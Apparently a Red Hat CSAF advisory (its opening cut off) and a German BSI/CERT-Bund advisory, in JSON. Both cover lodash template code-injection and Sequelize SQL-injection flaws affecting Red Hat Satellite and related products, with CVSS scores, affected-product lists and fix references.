"name": "Red Hat SDEngine",
"version": "4.8.1"
}
},
"id": "RHSA-2026:8498",
"initial_release_date": "2026-04-16T15:09:56+00:00",
"revision_history": [
{
"date": "2026-04-16T15:09:56+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-16T15:10:06+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-22T08:51:17+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Satellite 6.18",
"product": {
"name": "Red Hat Satellite 6.18",
"product_id": "Red Hat Satellite 6.18",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:satellite:6.18::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Satellite"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64",
"product": {
"name": "registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64",
"product_id": "registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/iop-remediations-rhel9@sha256%3A94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c?arch=amd64\u0026repository_url=registry.redhat.io/satellite\u0026tag=1776194798"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64 as a component of Red Hat Satellite 6.18",
"product_id": "Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
},
"product_reference": "registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64",
"relates_to_product_reference": "Red Hat Satellite 6.18"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-4800",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2026-03-31T20:01:21.918257+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2453496"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in lodash. The fix for CVE-2021-23337 added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink. Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "lodash: lodash: Arbitrary code execution via untrusted input in template imports",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In the context of Red Hat Enterprise Linux, the grafana and grafana-pcp packages execute the affected JavaScript entirely client-side within the user\u0027s browser. Consequently, the attack surface is strictly restricted to the local browser environment.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4800"
},
{
"category": "external",
"summary": "RHBZ#2453496",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453496"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4800",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-35jh-r3h4-6jhm",
"url": "https://github.com/advisories/GHSA-35jh-r3h4-6jhm"
},
{
"category": "external",
"summary": "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c",
"url": "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c"
}
],
"release_date": "2026-03-31T19:25:55.987000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-16T15:09:56+00:00",
"details": "For Red Hat Lightspeed in Satellite installations, see the Red Hat Satellite documentation.",
"product_ids": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8498"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "lodash: lodash: Arbitrary code execution via untrusted input in template imports"
},
{
"cve": "CVE-2026-30951",
"cwe": {
"id": "CWE-89",
"name": "Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)"
},
"discovery_date": "2026-03-10T21:01:17.729955+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2446250"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Sequelize, a Node.js Object-Relational Mapper (ORM) tool. A remote attacker can exploit a SQL injection vulnerability by manipulating JSON object keys during JSON/JSONB where clause processing. This allows for the injection of arbitrary SQL commands due to the improper handling of cast types. The primary consequence is the potential for unauthorized data exfiltration from any database table.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "sequelize: Sequelize: Data exfiltration via SQL injection in JSON/JSONB where clause processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-30951"
},
{
"category": "external",
"summary": "RHBZ#2446250",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446250"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-30951",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-30951"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-30951",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30951"
},
{
"category": "external",
"summary": "https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr",
"url": "https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr"
}
],
"release_date": "2026-03-10T20:22:46.150000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-16T15:09:56+00:00",
"details": "For Red Hat Lightspeed in Satellite installations, see the Red Hat Satellite documentation.",
"product_ids": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8498"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "sequelize: Sequelize: Data exfiltration via SQL injection in JSON/JSONB where clause processing"
}
]
}
WID-SEC-W-2026-1160
Vulnerability from csaf_certbund - Published: 2026-04-16 22:00 - Updated: 2026-05-20 22:00

| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Red Hat OpenShift Data Foundation 4.17.24 (Red Hat / OpenShift) | cpe:/a:redhat:openshift:data_foundation_4.17.24 | Data Foundation 4.17.24 | |
| Red Hat OpenShift Network Observability 1.11.2 (Red Hat / OpenShift) | cpe:/a:redhat:openshift:network_observability_1.11.2 | Network Observability 1.11.2 | |
| Red Hat OpenShift Data Foundation 4.16.26 (Red Hat / OpenShift) | cpe:/a:redhat:openshift:data_foundation_4.16.26 | Data Foundation 4.16.26 | |
| Red Hat OpenShift Data Foundation 4.18.20 (Red Hat / OpenShift) | cpe:/a:redhat:openshift:data_foundation_4.18.20 | Data Foundation 4.18.20 | |
| Red Hat Enterprise Linux (Red Hat / Enterprise Linux) | cpe:/o:redhat:enterprise_linux:- | — | |
| Red Hat Satellite 6.18 (Red Hat / Satellite) | cpe:/a:redhat:satellite:6.18 | 6.18 | |
| Red Hat Enterprise Linux 9 (Red Hat / Enterprise Linux) | cpe:/o:redhat:enterprise_linux:9 | 9 | |
| Red Hat OpenShift Container Platform <4.17.54 (Red Hat / OpenShift) | | Container Platform <4.17.54 | |
| Oracle Linux (Oracle) | cpe:/o:oracle:linux:- | — | |
| HCL BigFix WebUI (HCL / BigFix) | cpe:/a:hcltech:bigfix:webui | WebUI | |
| RESF Rocky Linux (RESF) | cpe:/o:resf:rocky_linux:- | — | |
| Red Hat OpenShift Container Platform <4.18.42 (Red Hat / OpenShift) | | Container Platform <4.18.42 | |
| Fedora Linux (Fedora) | cpe:/o:fedoraproject:fedora:- | — | |
| Red Hat OpenShift Container Platform <4.20.23 (Red Hat / OpenShift) | | Container Platform <4.20.23 | |
| IBM MQ (IBM) | cpe:/a:ibm:mq:- | — | |
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Red Hat Enterprise Linux (RHEL) ist eine popul\u00e4re Linux-Distribution.\r\nRed Hat Satellite dient als zentrale Stelle f\u00fcr das Management und die Verteilung von Updates in Netzwerken mit Red Hat Enterprise Linux Systemen.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat Enterprise Linux und Red Hat Satellite ausnutzen, um Informationen offenzulegen oder beliebigen Code auszuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-1160 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-1160.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-1160 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1160"
},
{
"category": "external",
"summary": "RedHat Security Advisory vom 2026-04-16",
"url": "https://access.redhat.com/errata/RHSA-2026:8498"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:10131 vom 2026-04-23",
"url": "https://access.redhat.com/errata/RHSA-2026:10131"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:10175 vom 2026-04-23",
"url": "https://access.redhat.com/errata/RHSA-2026:10175"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:10713 vom 2026-04-27",
"url": "https://access.redhat.com/errata/RHSA-2026:10713"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:10710 vom 2026-04-27",
"url": "https://access.redhat.com/errata/RHSA-2026:10710"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-10710 vom 2026-04-27",
"url": "https://linux.oracle.com/errata/ELSA-2026-10710.html"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:10710 vom 2026-04-28",
"url": "https://errata.build.resf.org/RLSA-2026:10710"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11493 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11493"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11471 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11471"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11470 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11470"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11516 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11516"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-10713 vom 2026-04-28",
"url": "https://linux.oracle.com/errata/ELSA-2026-10713.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11454 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11454"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11469 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11469"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11494 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11494"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11495 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11495"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:12277 vom 2026-04-30",
"url": "https://access.redhat.com/errata/RHSA-2026:12277"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:12279 vom 2026-04-30",
"url": "https://access.redhat.com/errata/RHSA-2026:12279"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:13553 vom 2026-05-04",
"url": "https://access.redhat.com/errata/RHSA-2026:13553"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:13571 vom 2026-05-05",
"url": "https://access.redhat.com/errata/RHSA-2026:13571"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:13545 vom 2026-05-04",
"url": "https://access.redhat.com/errata/RHSA-2026:13545"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:13826 vom 2026-05-05",
"url": "https://access.redhat.com/errata/RHSA-2026:13826"
},
{
"category": "external",
"summary": "Fedora Security Advisory FEDORA-2026-301CBBE347 vom 2026-05-08",
"url": "https://bodhi.fedoraproject.org/updates/FEDORA-2026-301cbbe347"
},
{
"category": "external",
"summary": "Fedora Security Advisory FEDORA-2026-793B55138D vom 2026-05-08",
"url": "https://bodhi.fedoraproject.org/updates/FEDORA-2026-793b55138d"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:14870 vom 2026-05-07",
"url": "https://access.redhat.com/errata/RHSA-2026:14870"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:14871 vom 2026-05-07",
"url": "https://access.redhat.com/errata/RHSA-2026:14871"
},
{
"category": "external",
"summary": "HCL Security Bulletin",
"url": "https://support.hcl-software.com/csm?id=kb_article\u0026sysparm_article=KB0130587"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:16874 vom 2026-05-13",
"url": "https://access.redhat.com/errata/RHSA-2026:16874"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17547 vom 2026-05-14",
"url": "https://access.redhat.com/errata/RHSA-2026:17547"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17550 vom 2026-05-14",
"url": "https://access.redhat.com/errata/RHSA-2026:17550"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17549 vom 2026-05-14",
"url": "https://access.redhat.com/errata/RHSA-2026:17549"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7273145 vom 2026-05-15",
"url": "https://www.ibm.com/support/pages/node/7273145"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19008 vom 2026-05-19",
"url": "https://access.redhat.com/errata/RHSA-2026:19008"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19410 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19410"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19167 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19167"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17469 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:17469"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17468 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:17468"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17448 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:17448"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19712 vom 2026-05-21",
"url": "https://access.redhat.com/errata/RHSA-2026:19712"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17598 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:17598"
}
],
"source_lang": "en-US",
"title": "Red Hat Enterprise Linux und Satellite (satellite/iop-remediations-rhel9 container image): Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-05-20T22:00:00.000+00:00",
"generator": {
"date": "2026-05-21T07:57:16.239+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.6.0"
}
},
"id": "WID-SEC-W-2026-1160",
"initial_release_date": "2026-04-16T22:00:00.000+00:00",
"revision_history": [
{
"date": "2026-04-16T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-04-23T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-04-26T22:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-04-27T22:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Rocky Enterprise Software Foundation aufgenommen"
},
{
"date": "2026-04-28T22:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Red Hat und Oracle Linux aufgenommen"
},
{
"date": "2026-05-03T22:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-05-04T22:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-05-05T22:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-05-07T22:00:00.000+00:00",
"number": "9",
"summary": "Neue Updates von Fedora und Red Hat aufgenommen"
},
{
"date": "2026-05-10T22:00:00.000+00:00",
"number": "10",
"summary": "Neue Updates von HCL aufgenommen"
},
{
"date": "2026-05-14T22:00:00.000+00:00",
"number": "11",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-05-17T22:00:00.000+00:00",
"number": "12",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2026-05-19T22:00:00.000+00:00",
"number": "13",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-05-20T22:00:00.000+00:00",
"number": "14",
"summary": "Neue Updates von Red Hat aufgenommen"
}
],
"status": "final",
"version": "14"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Fedora Linux",
"product": {
"name": "Fedora Linux",
"product_id": "74185",
"product_identification_helper": {
"cpe": "cpe:/o:fedoraproject:fedora:-"
}
}
}
],
"category": "vendor",
"name": "Fedora"
},
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "WebUI",
"product": {
"name": "HCL BigFix WebUI",
"product_id": "T036098",
"product_identification_helper": {
"cpe": "cpe:/a:hcltech:bigfix:webui"
}
}
}
],
"category": "product_name",
"name": "BigFix"
}
],
"category": "vendor",
"name": "HCL"
},
{
"branches": [
{
"category": "product_name",
"name": "IBM MQ",
"product": {
"name": "IBM MQ",
"product_id": "T021398",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:mq:-"
}
}
}
],
"category": "vendor",
"name": "IBM"
},
{
"branches": [
{
"category": "product_name",
"name": "Oracle Linux",
"product": {
"name": "Oracle Linux",
"product_id": "T004914",
"product_identification_helper": {
"cpe": "cpe:/o:oracle:linux:-"
}
}
}
],
"category": "vendor",
"name": "Oracle"
},
{
"branches": [
{
"category": "product_name",
"name": "RESF Rocky Linux",
"product": {
"name": "RESF Rocky Linux",
"product_id": "T032255",
"product_identification_helper": {
"cpe": "cpe:/o:resf:rocky_linux:-"
}
}
}
],
"category": "vendor",
"name": "RESF"
},
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"category": "product_version",
"name": "9",
"product": {
"name": "Red Hat Enterprise Linux 9",
"product_id": "T052941",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:9"
}
}
}
],
"category": "product_name",
"name": "Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "Network Observability 1.11.2",
"product": {
"name": "Red Hat OpenShift Network Observability 1.11.2",
"product_id": "T054021",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:network_observability_1.11.2"
}
}
},
{
"category": "product_version",
"name": "Data Foundation 4.18.20",
"product": {
"name": "Red Hat OpenShift Data Foundation 4.18.20",
"product_id": "T054097",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:data_foundation_4.18.20"
}
}
},
{
"category": "product_version",
"name": "Data Foundation 4.16.26",
"product": {
"name": "Red Hat OpenShift Data Foundation 4.16.26",
"product_id": "T054098",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:data_foundation_4.16.26"
}
}
},
{
"category": "product_version",
"name": "Data Foundation 4.17.24",
"product": {
"name": "Red Hat OpenShift Data Foundation 4.17.24",
"product_id": "T054099",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:data_foundation_4.17.24"
}
}
},
{
"category": "product_version_range",
"name": "Container Platform \u003c4.20.23",
"product": {
"name": "Red Hat OpenShift Container Platform \u003c4.20.23",
"product_id": "T054390"
}
},
{
"category": "product_version",
"name": "Container Platform 4.20.23",
"product": {
"name": "Red Hat OpenShift Container Platform 4.20.23",
"product_id": "T054390-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform__4.20.23"
}
}
},
{
"category": "product_version_range",
"name": "Container Platform \u003c4.18.42",
"product": {
"name": "Red Hat OpenShift Container Platform \u003c4.18.42",
"product_id": "T054401"
}
},
{
"category": "product_version",
"name": "Container Platform 4.18.42",
"product": {
"name": "Red Hat OpenShift Container Platform 4.18.42",
"product_id": "T054401-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform__4.18.42"
}
}
},
{
"category": "product_version_range",
"name": "Container Platform \u003c4.17.54",
"product": {
"name": "Red Hat OpenShift Container Platform \u003c4.17.54",
"product_id": "T054403"
}
},
{
"category": "product_version",
"name": "Container Platform 4.17.54",
"product": {
"name": "Red Hat OpenShift Container Platform 4.17.54",
"product_id": "T054403-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform__4.17.54"
}
}
}
],
"category": "product_name",
"name": "OpenShift"
},
{
"branches": [
{
"category": "product_version",
"name": "6.18",
"product": {
"name": "Red Hat Satellite 6.18",
"product_id": "T052942",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:satellite:6.18"
}
}
}
],
"category": "product_name",
"name": "Satellite"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30951",
"product_status": {
"known_affected": [
"T054099",
"T054021",
"T054098",
"T054097",
"67646",
"T052942",
"T052941",
"T054403",
"T004914",
"T036098",
"T032255",
"T054401",
"74185",
"T054390",
"T021398"
]
},
"release_date": "2026-04-16T22:00:00.000+00:00",
"title": "CVE-2026-30951"
},
{
"cve": "CVE-2026-4800",
"product_status": {
"known_affected": [
"T054099",
"T054021",
"T054098",
"T054097",
"67646",
"T052942",
"T052941",
"T054403",
"T004914",
"T036098",
"T032255",
"T054401",
"74185",
"T054390",
"T021398"
]
},
"release_date": "2026-04-16T22:00:00.000+00:00",
"title": "CVE-2026-4800"
}
]
}